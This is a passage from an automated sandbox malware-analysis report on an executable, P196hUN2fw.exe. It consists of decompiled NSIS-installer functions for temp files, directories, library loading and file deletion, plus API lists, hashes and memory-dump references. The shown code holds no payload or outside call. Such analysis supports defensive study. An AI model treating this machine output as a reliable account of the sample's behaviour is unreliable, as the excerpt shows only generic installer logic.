              • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B5B
              Strings
              • "C:\Users\user\Desktop\P196hUN2fw.exe", xrefs: 00405B2D
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
              • nsa, xrefs: 00405B38
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: "C:\Users\user\Desktop\P196hUN2fw.exe"$C:\Users\user\AppData\Local\Temp\$nsa
              • API String ID: 1716503409-858039744
              • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
              • Instruction ID: 439a7608ba980c1fff97265348ba0c774925dff8d33d3cb941cf273fff524f8a
              • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
              • Instruction Fuzzy Hash: B0F082363042086BDB108F66DD04B9B7BA9DF91750F14803BFA48AA280D6B4E9588799
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004059EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 490 4059eb-405a06 call 405f65 call 405996 495 405a08-405a0a 490->495 496 405a0c-405a19 call 4061cf 490->496 497 405a5e-405a60 495->497 500 405a25-405a27 496->500 501 405a1b-405a1f 496->501 503 405a3d-405a46 lstrlenA 500->503 501->495 502 405a21-405a23 501->502 502->495 502->500 504 405a48-405a5c call 4058fd GetFileAttributesA 503->504 505 405a29-405a30 call 406268 503->505 504->497 510 405a32-405a35 505->510 511 405a37-405a38 call 405944 505->511 510->495 510->511 511->503
              C-Code - Quality: 53%
              			E004059EB(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405F65(0x42bc78, _a4);
				_t21 = E00405996(0x42bc78);
				if(_t21 != 0) {
					E004061CF(_t21);
					if(( *0x42f41c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc78;
						while(1) {
							_t11 = lstrlenA(0x42bc78);
							_push(0x42bc78);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00406268();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405944(0x42bc78);
								continue;
							} else {
								goto L1;
							}
						}
						E004058FD();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









              0x004059f7
              0x00405a02
              0x00405a06
              0x00405a0d
              0x00405a19
              0x00405a25
              0x00405a25
              0x00405a3d
              0x00405a3e
              0x00405a45
              0x00405a46
              0x00000000
              0x00000000
              0x00405a29
              0x00405a30
              0x00405a38
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405a30
              0x00405a48
              0x00405a4e
              0x00000000
              0x00405a5c
              0x00405a1b
              0x00405a1f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405a1f
              0x00405a08
              0x00000000

              APIs
                • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                • Part of subcall function 00405996: CharNextA.USER32(?,?,C:\,?,00405A02,C:\,C:\,766DFA90,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
                • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
              • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,766DFA90,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A3E
              • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,766DFA90,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,766DFA90,C:\Users\user\AppData\Local\Temp\), ref: 00405A4E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CharNext$AttributesFilelstrcpynlstrlen
              • String ID: C:\$C:\Users\user\AppData\Local\Temp\
              • API String ID: 3248276644-1964270705
              • Opcode ID: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
              • Instruction ID: 1f06baf1138d21f74630751e728cacf5283a8138a78bcc2982ba797f27b9272c
              • Opcode Fuzzy Hash: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
              • Instruction Fuzzy Hash: 53F0C831315DA256C622323A1D45AAF1B45CE87338709477FF891B12D2EB3C89439EBD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 513 401ffd-402009 514 4020c4-4020c6 513->514 515 40200f-402025 call 402ac1 * 2 513->515 516 402237-40223c call 401423 514->516 526 402034-402042 LoadLibraryExA 515->526 527 402027-402032 GetModuleHandleA 515->527 522 402951-402960 516->522 523 402716-40271d 516->523 523->522 528 402044-402051 GetProcAddress 526->528 530 4020bd-4020bf 526->530 527->526 527->528 531 402090-402095 call 40508c 528->531 532 402053-402059 528->532 530->516 537 40209a-40209d 531->537 533 402072-40208e 532->533 534 40205b-402067 call 401423 532->534 533->537 534->537 545 402069-402070 534->545 537->522 540 4020a3-4020ab call 403755 537->540 540->522 544 4020b1-4020b8 FreeLibrary 540->544 544->522 545->537
              C-Code - Quality: 60%
              			E00401FFD(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4d8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4a8 =  *0x42f4a8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402AC1(0xfffffff0);
				 *(_t34 + 8) = E00402AC1(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040508C(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b81c, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403755(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










              0x00401ffd
              0x00401ffd
              0x00402002
              0x00402009
              0x004020c4
              0x00402237
              0x00402237
              0x00402951
              0x00402954
              0x00402960
              0x00402960
              0x00402018
              0x00402022
              0x00402025
              0x00402034
              0x00402038
              0x0040203e
              0x00402042
              0x004020bd
              0x00000000
              0x004020bd
              0x00402044
              0x0040204d
              0x00402051
              0x00402095
              0x00402053
              0x00402056
              0x00402059
              0x00402089
              0x0040205b
              0x0040205e
              0x00402067
              0x00402069
              0x00402069
              0x00402067
              0x00402059
              0x0040209d
              0x004020b2
              0x004020b2
              0x00000000
              0x0040209d
              0x00402028
              0x0040202e
              0x00402032
              0x00000000
              0x00000000
              0x00000000

              APIs
              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,00419517,766DEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,0042A050,00000000,00419517,766DEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                • Part of subcall function 0040508C: lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,00419517,766DEA30), ref: 004050E8
                • Part of subcall function 0040508C: SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
              • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
              • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
              • String ID:
              • API String ID: 2987980305-0
              • Opcode ID: c269c81cb85478e00bfc3d4b8c9c0837da33454893b7d03bdc32fa3c52a9d6d9
              • Instruction ID: 3b54ba627a5d3606a08c88bc2c88048367fe0e0edc5ddf34d35ff9eabd327fef
              • Opcode Fuzzy Hash: c269c81cb85478e00bfc3d4b8c9c0837da33454893b7d03bdc32fa3c52a9d6d9
              • Instruction Fuzzy Hash: A721DB71A04225ABCF207FA48E49B6E7670AB14358F20413BFB11B62D0CBBD4942966E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 546 4015bb-4015ce call 402ac1 call 405996 551 4015d0-4015e3 call 405928 546->551 552 401624-401627 546->552 560 4015e5-4015e8 551->560 561 4015fb-4015fc call 4055cf 551->561 554 401652-40223c call 401423 552->554 555 401629-401644 call 401423 call 405f65 SetCurrentDirectoryA 552->555 568 402951-402960 554->568 569 402716-40271d 554->569 555->568 576 40164a-40164d 555->576 560->561 565 4015ea-4015f1 call 4055ec 560->565 567 401601-401603 561->567 565->561 580 4015f3-4015f4 call 405552 565->580 573 401605-40160a 567->573 574 40161a-401622 567->574 569->568 578 401617 573->578 579 40160c-401615 GetFileAttributesA 573->579 574->551 574->552 576->568 578->574 579->574 579->578 582 4015f9 580->582 582->567
              C-Code - Quality: 87%
              			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402AC1(0xfffffff0);
				_t13 = E00405996(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405928(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004055CF(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004055EC(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405552(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405F65("C:\\Users\\alfons\\AppData\\Local\\Temp\\nst356E.tmp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













              0x004015bb
              0x004015c2
              0x004015c5
              0x004015ca
              0x004015ce
              0x004015d0
              0x004015d8
              0x004015da
              0x004015dc
              0x004015e0
              0x004015e3
              0x004015fb
              0x004015fc
              0x004015e5
              0x004015e5
              0x004015e8
              0x00000000
              0x004015f3
              0x004015f4
              0x004015f4
              0x004015e8
              0x00401603
              0x0040160a
              0x00401617
              0x00401617
              0x0040160c
              0x0040160d
              0x00401615
              0x00000000
              0x00000000
              0x00401615
              0x0040160a
              0x0040161a
              0x0040161d
              0x0040161f
              0x00401620
              0x004015d0
              0x00401627
              0x00401652
              0x00402237
              0x00401629
              0x0040162b
              0x00401636
              0x0040163c
              0x00401644
              0x0040164a
              0x0040164a
              0x00401644
              0x00402954
              0x00402960

              APIs
                • Part of subcall function 00405996: CharNextA.USER32(?,?,C:\,?,00405A02,C:\,C:\,766DFA90,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
                • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                • Part of subcall function 00405552: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405595
              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\nst356E.tmp,00000000,00000000,000000F0), ref: 0040163C
              Strings
              • C:\Users\user\AppData\Local\Temp\nst356E.tmp, xrefs: 00401631
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CharNext$Directory$AttributesCreateCurrentFile
              • String ID: C:\Users\user\AppData\Local\Temp\nst356E.tmp
              • API String ID: 1892508949-321141468
              • Opcode ID: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
              • Instruction ID: 323619fe81b3529d61600e1e0eff0ce417d4ac591c1c2d39a63079fc07480124
              • Opcode Fuzzy Hash: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
              • Instruction Fuzzy Hash: 2B11C431608152EBCB217BA54D415BF2AB4DA96324B28093FE9D1B22E2D63D4D425A2E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004056E5 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 587 4056e5-4056f6 call 405ad9 590 405726 587->590 591 4056f8-4056fe 587->591 592 405728-40572a 590->592 593 405700-405706 RemoveDirectoryA 591->593 594 405708 DeleteFileA 591->594 595 40570e-405710 593->595 594->595 596 405712-405715 595->596 597 405717-40571c 595->597 596->592 597->590 598 40571e-405720 SetFileAttributesA 597->598 598->590
              C-Code - Quality: 41%
              			E004056E5(void* __eflags, CHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				CHAR* _t14;

				_t14 = _a4;
				_t13 = E00405AD9(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileA(); // executed
				} else {
					_t9 = RemoveDirectoryA(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesA(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






              0x004056e6
              0x004056f1
              0x004056f6
              0x00405726
              0x00000000
              0x00405726
              0x004056fd
              0x004056fe
              0x00405708
              0x00405700
              0x00405700
              0x00405700
              0x00405710
              0x0040571c
              0x00405720
              0x00405720
              0x00000000
              0x00405712
              0x00000000
              0x00405714

              APIs
                • Part of subcall function 00405AD9: GetFileAttributesA.KERNELBASE(?,?,004056F1,?,?,00000000,004058D4,?,?,?,?), ref: 00405ADE
                • Part of subcall function 00405AD9: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405AF2
              • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,004058D4), ref: 00405700
              • DeleteFileA.KERNELBASE(?,?,?,00000000,004058D4), ref: 00405708
              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405720
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: File$Attributes$DeleteDirectoryRemove
              • String ID:
              • API String ID: 1655745494-0
              • Opcode ID: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
              • Instruction ID: ab3c30a2a51d8520bfc91e36631e3b158bafcebe445a439927c7769123fd08c9
              • Opcode Fuzzy Hash: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
              • Instruction Fuzzy Hash: E4E0E531115A91D6C2106774AE0865B2AD8EFC6364F05493BF892B30C0DB78880BAA6E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 599 401389-40138e 600 4013fa-4013fc 599->600 601 401390-4013a0 600->601 602 4013fe 600->602 601->602 603 4013a2-4013a3 call 401434 601->603 604 401400-401401 602->604 606 4013a8-4013ad 603->606 607 401404-401409 606->607 608 4013af-4013b7 call 40136d 606->608 607->604 611 4013b9-4013bb 608->611 612 4013bd-4013c2 608->612 613 4013c4-4013c9 611->613 612->613 613->600 614 4013cb-4013f4 MulDiv SendMessageA 613->614 614->600
              C-Code - Quality: 59%
              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f450;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ebec =  *0x42ebec + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ebec, 0x7530,  *0x42ebd4), 0);
					}
				}
				return 0;
			}











              0x0040138a
              0x004013fa
              0x0040139b
              0x004013a0
              0x00000000
              0x00000000
              0x004013a2
              0x004013a3
              0x004013ad
              0x00000000
              0x00401404
              0x004013b0
              0x004013b7
              0x004013bd
              0x004013be
              0x004013c0
              0x004013c2
              0x004013b9
              0x004013b9
              0x004013ba
              0x004013ba
              0x004013c9
              0x004013cb
              0x004013f4
              0x004013f4
              0x004013c9
              0x00000000

              APIs
              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
              • Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
              • Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
              • Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004062FD Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004062FD(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E0040628F(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





              0x00406305
              0x00406308
              0x0040630f
              0x00406317
              0x00406323
              0x00000000
              0x0040632a
              0x0040631a
              0x00406321
              0x00000000
              0x00406332
              0x00000000

              APIs
              • GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
              • GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                • Part of subcall function 0040628F: GetSystemDirectoryA.KERNEL32 ref: 004062A6
                • Part of subcall function 0040628F: wsprintfA.USER32 ref: 004062DF
                • Part of subcall function 0040628F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
              • String ID:
              • API String ID: 2547128583-0
              • Opcode ID: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
              • Instruction ID: 0a5867ae11c12db0e7684f2d0d3995392d51af775f5f68958dac655171f1c28e
              • Opcode Fuzzy Hash: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
              • Instruction Fuzzy Hash: 83E08C32604221ABD210AB749E0493B63A8EF98740306483EF94AF2240DB3C9C7296A9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405AFE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E00405AFE(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





              0x00405b02
              0x00405b0f
              0x00405b24
              0x00405b2a

              APIs
              • GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\P196hUN2fw.exe,80000000,00000003), ref: 00405B02
              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
